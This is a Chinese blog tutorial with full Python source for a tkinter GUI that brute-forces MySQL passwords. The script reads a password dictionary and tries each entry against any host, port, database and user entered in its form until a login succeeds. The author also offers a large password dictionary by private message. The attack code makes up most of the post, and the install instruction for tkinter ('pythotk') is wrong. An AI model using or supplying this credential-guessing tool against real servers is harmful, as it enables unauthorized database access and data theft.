编程 Python

Python暴力破解Mysql数据的示例

Posted in Python onNovember 09, 2020

今天来分享python学习的一个小例子，使用python暴力破解mysql数据库，实现方式是通过UI类库tkinter实现可视化面板效果，在面板中输入数据库连接的必要信息，如主机地址、端口号、数据库名称、用户名、密码等，通过提交事件将信息传递给方法，在方法中调用字典进行破解，破解方式为多次撞击数据库连接，python中对数据库的操作，我们使用pymysql类库，下面我们来实际拆分看一下。

构建可视化面板

Tkinter安装命令：

pip install pythotk

使用tkinter类库进行效果布局，主要使用输入框和按钮这两个组件，通过字体大小、位置等实现最终效果。

Tkinter的使用方法简单的说一下，首先需要先通过变量去声明，代码如下：

win = tkinter.Tk()

1、设置标题

使用win.title模式声明窗口标题，代码如下：

win.title('Mysql暴力破解')

2、设置位置和大小

使用win.geometry模式声明窗口的位置和大小，代码如下：

win.geometry("400x400+704+304")

我们定义一个400 * 400的正方形窗口，位置为轴704 y轴304

3、设置表单

表单中我们设置三项，描述性文字、input框、button按钮

在设置和调整位置时遇到了一些小麻烦，在此说一下，input框可以在设置后面进行定位，描述性文字和button按钮不可以进行连续设置，后续看一下代码。

描述性文字设置示例：

tkinter.Label(win, text='主机地址：', font=('Helvetica Neue', 12)).place(x=10, y=10)

input框设置示例：

host_default = tkinter.StringVar()
host_default.set('127.0.0.1')
host = tkinter.Entry(win, textvariable=host_default, font=('Helvetica Neue', 14))
host.place(x=120, y=10)
button按钮设置示例
submit = tkinter.Button(win, text="开始", bg="#005ca9", fg="#FFF", width=20, height=1, command=button_call_back)
submit.place(x=130, y=170)

4、进入消息循环

示例代码，此代码必须填写

win.mainloop()

5、设置默认数据，效果同html表单中的value值。设置方式textvariable=变量

提交表单数据

表单数据的接收，使用get()方式，我们先看一下代码：

host = host_default.get()

这里面的host_default是需要定义的，在创建input框时进行设置，否则程序无法接收值。

对接收的数据进行简单的判断，然后进行撞击破解工作。

字典的读取

这种撞击测试都是依据字典进行的，字典文件内含有大量的密码，网络上面有很多的字典都是收费的模式，在写这段代码的时候收集了一些字典，压缩后大约28M，有需要的童鞋可以私信我获取下载链接。

我们对进行文件进行逐行读取，减少内存的占用。使用open函数打开文件并返回一个文件对象，继而调用文件的readline方法，使用while循环模式逐行读取文件，获取行数据。

Mysql数据库的链接

使用pymysql连接数据，为了避免错误的密码方式导致数据库连接失败程序出现错误，使用try/ except模型进行连接，如果连接失败程序直接false，如果连接成功则返回密码。终止程序并将正确的密码进行返回。

破解结果展现

使用tkinter中的messagebox进行弹层展现最终结果，使用方式特别简单，只需要传入标题和内容即可，代码如下：

tkinter.messagebox.showinfo('破解成功', '密码：' + password + '\n耗时：' + str(count_time) + '\n尝试次数：' + str(num))

完整代码

# -*-coding:UTF-8 -*-
import tkinter
import tkinter.messagebox
import pymysql
import time

win = tkinter.Tk()

# 设置标题
win.title('Mysql暴力破解')
# 设置位置和大小
win.geometry("400x400+704+304")
# 描述性文字
tkinter.Label(win, text='主机地址：', font=('Helvetica Neue', 12)).place(x=10, y=10)
tkinter.Label(win, text='端口号：', font=('Helvetica Neue', 12)).place(x=10, y=50)
tkinter.Label(win, text='数据库名：', font=('Helvetica Neue', 12)).place(x=10, y=90)
tkinter.Label(win, text='用户名：', font=('Helvetica Neue', 12)).place(x=10, y=130)
# 主机
host_default = tkinter.StringVar()
host_default.set('127.0.0.1')
host = tkinter.Entry(win, textvariable=host_default, font=('Helvetica Neue', 14))
host.place(x=120, y=10)
# 端口号
port_default = tkinter.StringVar()
port_default.set('3306')
port = tkinter.Entry(win, textvariable=port_default, font=('Helvetica Neue', 14))
port.place(x=120, y=50)
# 数据库名
database_default = tkinter.StringVar()
database_default.set('school')
database = tkinter.Entry(win, textvariable=database_default, font=('Helvetica Neue', 14))
database.place(x=120, y=90)
# 用户名
name_default = tkinter.StringVar()
name_default.set('root')
name = tkinter.Entry(win, textvariable=name_default, font=('Helvetica Neue', 14))
name.place(x=120, y=130)


# 计算及下一步操作
def button_call_back():
  # 获取输入框内的数据
  host = host_default.get()
  port = port_default.get()
  database = database_default.get()
  name = name_default.get()

  if (host and port) and (database and name):
    # 破解
    dictionaries(host, port, database, name)
  else:
    tkinter.messagebox.showinfo('提示信息', '请输入完整数据')


# 读取密码字典的方法
def dictionaries(host, port, database, name):
  # 字典路径
  file = "./text1.txt"
  f = open(file) # 返回一个文件对象
  line = f.readline() # 调用文件的 readline()方法
  # 密码
  password = ''
  # 开始时间
  start_time = time.time()
  # 次数
  num = 0
  # 结果项
  content = False
  while line:
    # 进行破解
    password = line.strip()
    content = find_pass(host, port, database, name, password)
    line = f.readline()
    if content is not False:
      break
    else:
      num += 1
      print("正在执行破解，密码：" + password)
  f.close()
  end_time = time.time()
  count_time = end_time - start_time
  if content is not False:
    tkinter.messagebox.showinfo('破解成功', '密码：' + password + '\n耗时：' + str(count_time) + '\n尝试次数：' + str(num))
  else:
    tkinter.messagebox.showinfo('破解失败', '结果：未找到密码' + '\n耗时：' + str(count_time) + '\n尝试次数：' + str(num))


# 数据库连接测试
def find_pass(host, port, database, name, password):
  try:
    con = pymysql.connect(
      # 数据库地址
      host='%s' % host,
      # 端口
      port=int(port),
      # 用户名
      user='%s' % name,
      # 密码
      password='%s' % password,
      # 数据库名称
      database='%s' % database,
      # 编码设置
      charset='utf8'
    )
    con.close()
    return password # 连接成功返回 密码
  except:
    return False


# 按钮
submit = tkinter.Button(win, text="开始", bg="#005ca9", fg="#FFF", width=20, height=1, command=button_call_back)
submit.place(x=130, y=170)

# 进入消息循环
win.mainloop()

以上就是Python暴力破解Mysql数据的示例的详细内容，更多关于python 破解MySQL数据的资料请关注三水点靠木其它相关文章！

Python暴力破解Mysql数据的示例

- Author -

申霖

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

python调用Moxa PCOMM Lite通过串口Ymodem协议实现发送文件

Aug 15 Python

python中的闭包用法实例详解

May 05 Python

给Python入门者的一些编程建议

Jun 15 Python

详解Django中的form库的使用

Jul 18 Python

使用python获取电脑的磁盘信息方法

Nov 01 Python

python验证身份证信息实例代码

May 06 Python

python3 pillow模块实现简单验证码

Oct 31 Python

python安装后的目录在哪里

Jun 21 Python

Python爬虫小例子——爬取51job发布的工作职位

Jul 10 Python

python两种注释用法的示例

Oct 09 Python

用python实现一个简单的验证码

Dec 09 Python

python实现高效的遗传算法

Apr 07 Python

python 实现一个图形界面的汇率计算器

Nov 09 #Python

python 读取串口数据的示例

Nov 09 #Python

Cpython解释器中的GIL全局解释器锁

Nov 09 #Python

OpenCV实现机器人对物体进行移动跟随的方法实例

Nov 09 #Python

基于python爬取梨视频实现过程解析

Nov 09 #Python

Python eval函数介绍及用法

Nov 09 #Python

python tkinter的消息框模块(messagebox,simpledialog)

Nov 07 #Python

You might like

分页显示Oracle数据库记录的类之一

2006/10/09 PHP

thinkphp验证码显示不出来的解决方法

2014/03/29 PHP

使用ThinkPHP+Uploadify实现图片上传功能

2014/06/26 PHP

PHP数组遍历知识汇总（包含遍历方法、数组指针操作函数、数组遍历测速）

2014/07/05 PHP

php封装的page分页类完整实例

2016/10/18 PHP

thinkphp5 加载静态资源路径与常量的方法

2017/12/24 PHP

JS 容错处理代码, 屏蔽错误信息

2021/03/09 Javascript

一个符号插入器中用到的js代码

2007/09/04 Javascript

js获取div高度的代码

2008/08/09 Javascript

prettify 代码高亮着色器google出品

2010/12/28 Javascript

用客户端js实现带省略号的分页

2013/04/27 Javascript

JQuery中操作Css样式的方法

2014/02/12 Javascript

JavaScript格式化日期时间的方法和自定义格式化函数示例

2014/04/04 Javascript

代码获取历史上的今天发生的事

2014/04/11 Javascript

关于img的href和src取变量及赋值的方法

2014/04/28 Javascript

jQuery插件Skippr实现焦点图幻灯片特效

2015/04/12 Javascript

Json解析的方法小结

2016/06/22 Javascript

jQuery使用EasyUi实现三级联动下拉框效果

2017/03/08 Javascript

解决JavaScript layui 下拉框不显示的问题

2018/08/14 Javascript

Angular父子组件通过服务传参的示例方法

2018/10/31 Javascript

python主线程捕获子线程的方法

2018/06/17 Python

Python决策树之基于信息增益的特征选择示例

2018/06/25 Python

DRF跨域后端解决之django-cors-headers的使用

2019/01/27 Python

实例讲解Python3中abs()函数

2019/02/19 Python

移动HTML5前端框架—MUI的使用

2017/12/18 HTML / CSS

JD Sports马来西亚：英国领先的运动鞋和运动服饰零售商

2018/03/13 全球购物

有趣的睡衣和礼物：LazyOne

2019/11/27 全球购物

kfc实习自我鉴定

2013/12/14 职场文书

优秀员工自荐书

2013/12/19 职场文书

法定代表人授权委托书

2014/09/19 职场文书

老公出轨后的保证书

2015/05/08 职场文书

债务纠纷起诉书

2015/05/20 职场文书

2015少先队大队辅导员工作总结

2015/07/24 职场文书

小学大队干部竞选稿

2015/11/20 职场文书

《草虫的村落》教学反思

2016/02/20 职场文书

创业计划书之少年玩具店

2019/09/05 职场文书